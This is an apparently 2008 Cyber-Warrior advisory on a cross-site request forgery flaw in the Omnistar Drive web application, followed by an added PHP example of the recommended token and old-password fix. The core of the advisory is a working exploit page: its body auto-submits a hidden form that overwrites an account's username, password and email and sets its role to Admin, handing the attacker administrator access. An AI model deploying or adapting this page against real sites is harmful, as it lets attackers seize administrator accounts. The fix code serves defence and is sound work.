Omnistar Drive ~ XSRF Vuln. | Cyber-Warrior Information Technology's World
Article
Author: Bug Researchers
Date: 14.11.2008 04:40:54
< ------------------- header data start ------------------- >
#############################################################
# Application Name : Omnistar Drive
# Vulnerable Type : XSRF
# Infection : The admin password can be changed remotely and automatically.
# Bug Fix Advice : A session key (session token) must be added to the form, and the old password must be requested.
# author : Bug Researchers
#############################################################
< ------------------- header data end of ------------------- >
<b0dy onLoad=Submit();>
<script>function Submit[]{document.ButterflyEffect.submit();}</script>
<form action=http://www.site.com/index.php?area=main&interface=users&sort_by=1&sort_order=ASC&page=1&return_to=@list&act=edit# method=post name=ButterflyEffect>
<input type=hidden name=id value=>
<input type=hidden name=username id=username value=ButterflyEffect size=20 maxlength=30 class=input >
<input type=hidden name=password id=password value=ButterflyEffect size=20 maxlength=30 class=input>
<input type=hidden name=confirm id=confirm value=ButterflyEffect size=20 maxlength=30 class=input>
<input type=hidden name=first_name id=first_name value=ButterflyEffect size=20 maxlength=30 class=input>
<input type=hidden name=last_name id=last_name value=ButterflyEffect size=20 maxlength=30 class=input>
<input type=hidden name=email id=email value=Bl@ButterflyEffect.com size=30 maxlength=255 class=input>
<select name=role id=role onChange=changeUserType(this); ><option value=Admin ></option>
<input type=hidden name=can_add value=checkin id=can_add_checkin>
<input type=hidden name=can_add_folders value=1 id=can_add_folders>
<input type=hidden name=must_be_reviewed value=1 id=must_be_reviewed>
<input type=hidden name=can_change_password value=1 checked id=can_change_password>
<input type=hidden name=can_mail_selected value=1 checked id=can_mail_selected>
<input type=hidden name=send_expired_email value=1 id=send_expired_email>
<input type=image src=http://img56.imageshack.us/img56/6712/kaydetr7c26ki8.gif>
< -- bug code end of -- >
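The fix advice in the header (a session token in the form, and asking for the old password) sketched in PHP as an added example; it is not Omnistar Drive's code or the author's. The function names, the `csrf_token` and `old_password` field names and the sample values are assumptions.

```php
<?php
// Added example, not Omnistar Drive code. Function names and the
// csrf_token / old_password fields are hypothetical.

// Create the per-session token once; the edit form echoes it in a hidden field.
function csrf_issue(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Constant-time comparison of the submitted token with the session copy.
function csrf_valid(array $session, array $post): bool {
    return isset($session['csrf_token'], $post['csrf_token'])
        && is_string($post['csrf_token'])
        && hash_equals($session['csrf_token'], $post['csrf_token']);
}

// Gate for the user-edit action. $current_hash is the password_hash() value
// stored for the logged-in account. Returns [accepted, reason].
function check_user_edit(array $session, array $post, string $method, string $current_hash): array {
    if ($method !== 'POST') return [false, 'method'];
    if (!csrf_valid($session, $post)) return [false, 'csrf'];
    if (($post['password'] ?? '') !== '') {              // password change requested
        $old = $post['old_password'] ?? '';
        if (!is_string($old) || !password_verify($old, $current_hash)) return [false, 'old_password'];
        if ($post['password'] !== ($post['confirm'] ?? null)) return [false, 'confirm'];
    }
    return [true, 'ok'];
}

// Constructed sample data.
$session = [];
$token   = csrf_issue($session);
$hash    = password_hash('current-secret', PASSWORD_DEFAULT);
$fields  = ['username' => 'alice', 'password' => 'new-secret', 'confirm' => 'new-secret'];

$cases = [
    'cross-site post, no token' => $fields,
    'token, no old password'    => $fields + ['csrf_token' => $token],
    'token and old password'    => $fields + ['csrf_token' => $token, 'old_password' => 'current-secret'],
];
foreach ($cases as $label => $post) {
    [$ok, $reason] = check_user_edit($session, $post, 'POST', $hash);
    printf("%-28s %s (%s)\n", $label, $ok ? 'accepted' : 'rejected', $reason);
}
```

In a real handler the arguments would be `$_SESSION`, `$_POST` and `$_SERVER['REQUEST_METHOD']`, with the check run before any field of the edit form is applied.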
Cyber-Warrior TIM All Legal and illegal Rights Reserved.\CWDoktoray 2001©